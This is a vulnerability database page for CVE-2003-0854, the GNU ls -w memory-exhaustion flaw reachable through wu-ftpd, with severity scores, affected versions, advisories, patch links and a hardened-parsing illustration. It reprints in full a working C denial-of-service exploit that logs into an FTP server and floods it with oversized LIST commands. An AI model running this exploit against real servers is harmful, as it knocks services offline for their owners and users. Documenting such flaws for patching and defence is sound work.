CVE-2003-0854
CVSS 2.1
Published: 2003-11-17 00:00:00
Revised: 2008-09-10 15:20:44
NMCOE

[Original] ls in the fileutils or coreutils packages allows local users to consume a large amount of memory via a large -w value, which can be remotely exploited via applications that use ls, such as wu-ftpd.


[CNNVD] Coreutils ls Width Argument Integer Overflow Vulnerability (CNNVD-200311-050)

Coreutils 'ls' is a tool for displaying file and directory information.
Coreutils 'ls' lacks proper bounds checking when it handles the width and column-display command-line arguments; a local or remote attacker can use this to trigger an integer overflow and crash the application.
Passing the oversized argument "-w X -C" (where X is an arbitrarily large value) to Coreutils 'ls' makes it allocate a very large block of memory and run into an integer overflow. A remote application that lets users invoke this 'ls' without filtering the arguments can therefore be crashed; the Wu-ftpd FTP server is affected in this way.
        
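As an added illustration of the width-to-allocation step described above (not code from coreutils, wu-ftpd or the exploit listed further down), here is a simplified model: the unchecked form derives a quadratic amount of column bookkeeping from the -w value with no bounds check, while the hardened form parses the width strictly, detects overflow and applies a cap. MIN_COLUMN_WIDTH, MAX_COLUMN_BYTES, the quadratic cost model and all function names are assumptions of this example.

```c
#include <ctype.h>
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* Assumed constants for this simplified model (not coreutils' values). */
#define MIN_COLUMN_WIDTH 3                      /* narrowest column the formatter tries */
#define MAX_COLUMN_BYTES (16u * 1024u * 1024u)  /* hard cap on column bookkeeping */

/* Unchecked form, mirroring the failure mode in the advisory: a layout is
 * tried for every column count up to line_length / MIN_COLUMN_WIDTH, and
 * layout i keeps i column widths, so the total is quadratic in the width.
 * A huge -w value either demands gigabytes or wraps size_t. */
size_t column_bytes_unchecked(unsigned long line_length)
{
    size_t max_cols = line_length / MIN_COLUMN_WIDTH;
    return max_cols * (max_cols + 1) / 2 * sizeof(size_t);
}

/* Hardened form: parse the width strictly, compute the same quantity with
 * overflow detection, and refuse anything above the cap.
 * Returns 0 and sets *bytes on success, -1 on rejection. */
int column_bytes_checked(const char *width_arg, size_t *bytes)
{
    char *end;
    unsigned long long width, max_cols, pairs;

    /* Only plain decimal digits: no sign, whitespace or trailing junk. */
    if (width_arg == NULL || !isdigit((unsigned char)width_arg[0]))
        return -1;
    errno = 0;
    width = strtoull(width_arg, &end, 10);
    if (errno == ERANGE || *end != '\0')
        return -1;                  /* too large for the type, or not all digits */

    max_cols = width / MIN_COLUMN_WIDTH;
    /* Keep max_cols * (max_cols + 1) below 2^64 so the cap check itself is sound. */
    if (max_cols > UINT32_MAX)
        return -1;
    pairs = max_cols * (max_cols + 1) / 2;
    if (pairs > MAX_COLUMN_BYTES / sizeof(size_t))
        return -1;                  /* would exceed the bookkeeping cap */

    *bytes = (size_t)(pairs * sizeof(size_t));
    return 0;
}

/* Convenience wrapper: bytes the hardened path would reserve, or 0 if rejected. */
size_t column_bytes_or_zero(const char *width_arg)
{
    size_t bytes;
    return column_bytes_checked(width_arg, &bytes) == 0 ? bytes : 0;
}
```

With the 1000000 value from the advisory the unchecked model asks for hundreds of gigabytes, while the hardened path rejects it before any allocation is attempted.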

- CVSS (base score)

CVSS score: 2.1 [LOW]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may cause reduced performance or interrupted access to resources]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr15
cpe:/a:washington_university:wu-ftpd:2.4.2_vr16
cpe:/a:washington_university:wu-ftpd:2.4.2_vr17
cpe:/a:washington_university:wu-ftpd:2.4.2_beta2::academ
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr7
cpe:/a:washington_university:wu-ftpd:2.4.1
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr10
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr13
cpe:/a:gnu:fileutils:4.0  GNU Fileutils 4.0
cpe:/a:gnu:fileutils:4.1  GNU Fileutils 4.1
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr4
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr5
cpe:/a:washington_university:wu-ftpd:2.6.1
cpe:/a:washington_university:wu-ftpd:2.6.0
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr8
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr11
cpe:/a:gnu:fileutils:4.0.36  GNU Fileutils 4.0.36
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr12
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr14
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr9
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18::academ
cpe:/a:washington_university:wu-ftpd:2.5.0
cpe:/a:gnu:fileutils:4.1.6  GNU Fileutils 4.1.6
cpe:/a:gnu:fileutils:4.1.7  GNU Fileutils 4.1.7
cpe:/a:washington_university:wu-ftpd:2.6.2
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr6

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0854
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0854
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200311-050
(Official data source) CNNVD

- Other links and resources

http://www.turbolinux.com/security/TLSA-2003-60.txt
(UNKNOWN)  TURBO  TLSA-2003-60
http://www.securityfocus.com/advisories/6014
(UNKNOWN)  IMMUNIX  IMNX-2003-7+-026-01
http://www.redhat.com/support/errata/RHSA-2003-310.html
(UNKNOWN)  REDHAT  RHSA-2003:310
http://www.redhat.com/support/errata/RHSA-2003-309.html
(UNKNOWN)  REDHAT  RHSA-2003:309
http://www.guninski.com/binls.html
(UNKNOWN)  MISC  http://www.guninski.com/binls.html
http://www.debian.org/security/2005/dsa-705
(UNKNOWN)  DEBIAN  DSA-705
http://support.avaya.com/elmodocs2/security/ASA-2005-213.pdf
(UNKNOWN)  CONFIRM  http://support.avaya.com/elmodocs2/security/ASA-2005-213.pdf
http://secunia.com/advisories/17069
(VENDOR_ADVISORY)  SECUNIA  17069
http://secunia.com/advisories/10126
(VENDOR_ADVISORY)  SECUNIA  10126
http://lists.grok.org.uk/pipermail/full-disclosure/2003-October/012548.html
(UNKNOWN)  FULLDISC  20031022 Fun with /bin/ls, yet still ls better than windows
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000771
(UNKNOWN)  CONECTIVA  CLA-2003:771
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000768
(UNKNOWN)  CONECTIVA  CLA-2003:768
http://www.milw0rm.com/exploits/115
(UNKNOWN)  MILW0RM  115
http://www.mandriva.com/security/advisories?name=MDKSA-2003:106
(UNKNOWN)  MANDRAKE  MDKSA-2003:106

- Vulnerability information

Coreutils ls Width Argument Integer Overflow Vulnerability
Low severity  Boundary condition error
2003-11-17 00:00:00 2006-09-20 00:00:00
Remote

- Advisories and patches

Vendor patches:
Conectiva
---------
The vendor has released upgrade packages that fix this security issue; download them from the vendor's site:
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/fileutils-4.0-20U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/fileutils-4.0-20U70_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/fileutils-4.1-3U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/SRPMS/fileutils-4.1-3U80_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/9/RPMS/fileutils-4.1-7779U90_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/9/SRPMS/fileutils-4.1-7779U90_1cl.src.rpm
GNU
---
The CVS tree has been fixed for this vulnerability:

http://mail.gnu.org/archive/html/bug-coreutils/2003-10/msg00070.html

- Vulnerability information (115)

wu-ftpd 2.6.2 Remote Denial Of Service Exploit (wuftpd-freezer.c) (EDBID:115)
linux dos
2003-10-31 Verified
0 Angelo Rosiello
N/A
/*
*     (c) Rosiello Security
*
* Copyright Rosiello Security 2003
*   All Rights reserved.
*
* Tested on Red Hat 9.0
*
* Author: Angelo Rosiello
* Mail  : angelo rosiello org
* This software is only for educational purpose.
* Do not use it against machines different from yours.
* Respect law.
*
*/

#include <stdio.h>
#include <stdlib.h>       /* atoi, exit */
#include <string.h>
#include <unistd.h>       /* write, close */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>    /* inet_addr */

void addr_initialize( struct sockaddr_in *address, int port, long IPaddr );
void usage( char *program );

int main( int argc, char **argv )
{
	int i, sd, PORT, loop, error;
	/* ch starts as a non-newline byte so the read loops below run */
	char user[30], password[30], ch = '\0';
	struct sockaddr_in server_addr;

	fprintf( stdout, "\n(c) Rosiello Security 2003\n" );
	fprintf( stdout, "http://www.rosiello.org\n" );
	fprintf( stdout, "WU-FTPD 2.6.2 Freezer by Angelo Rosiello\n\n" );

	if( argc != 6 ) usage( argv[0] );

	/* length checks keep "USER "/"PASS " + name + "\n" inside the 30-byte buffers */
	if( strlen( argv[3] ) > 20 ) exit( 0 );
	if( strlen( argv[4] ) > 20 ) exit( 0 );

	sprintf( user, "USER %s\n", argv[3] );
	sprintf( password, "PASS %s\n", argv[4] );

	PORT = atoi( argv[2] );
	loop = atoi( argv[5] );

	addr_initialize( &server_addr, PORT, ( long )inet_addr( argv[1] ));
	sd = socket( AF_INET, SOCK_STREAM, 0 );

	error = connect( sd, ( struct sockaddr * ) &server_addr, sizeof( server_addr ));
	if( error != 0 )
	{
		perror( "Something wrong with the connection" );
		exit( 0 );
	}

	/* read the server banner one byte at a time up to the end of line */
	while ( ch != '\n' )
	{
		recv( sd, &ch, 1, 0);
		printf("%c", ch );
	}

	ch = '\0';

	printf( "Connection executed, now waiting to log in...\n" );

	printf( "%s", user );

	send( sd, user, strlen( user ), 0 );
	while ( ch != '\n' )
	{
		recv( sd, &ch, 1, 0);
		printf("%c", ch );
	}
	printf( "%s", password );

	ch = '\0';

	send( sd, password, strlen( password ), 0 );
	while ( ch != '\n' )
	{
		recv( sd, &ch, 1, 0);
		printf("%c", ch );
	}

	/* each LIST line hands the oversized -w value straight to ls; this is the
	   unfiltered argument the advisory above describes */
	printf( "Sending the DoS query\n" );
	for( i=0; i<loop; i++ )
	{
		write( sd, "LIST -w 1000000 -C\n", 19 );
	}
	printf( "All done\n" );
	close( sd );
	return 0;
}

void addr_initialize (struct sockaddr_in *address, int port, long IPaddr)
{
	address -> sin_family = AF_INET;
	address -> sin_port = htons((u_short)port);
	address -> sin_addr.s_addr = IPaddr;
}

void usage( char *program )
{
	fprintf(stdout, "USAGE: <%s> <IP> <PORT> <USER> <PASS> <LOOP>\n", program);
	exit(0);
}


// milw0rm.com [2003-10-31]
		

- Vulnerability information

4620
GNU coreutils / fileutils ls -w Argument WU-FTPD Memory Consumption DoS
Local / Remote Denial of Service
Loss of Availability Upgrade
PoC Public Vendor Verified, Coordinated Disclosure

- Vulnerability description

GNU coreutils and fileutils contain a flaw in the 'ls' command that may allow a remote denial of service as e.g. demonstrated via wu-ftpd. The issue is triggered when handling overly large values supplied as arguments to the '-w' command line parameter. With a specially crafted command, a remote attacker can cause the application to consume a large amount of memory resources.

- Timeline

2003-10-22 Unknown
Unknown 2003-12-22

- Solution

It has been reported that this issue has been fixed. Upgrade to version 5.1.0, or higher, to address this vulnerability.

- Related references

- Vulnerability author

Unknown or Incomplete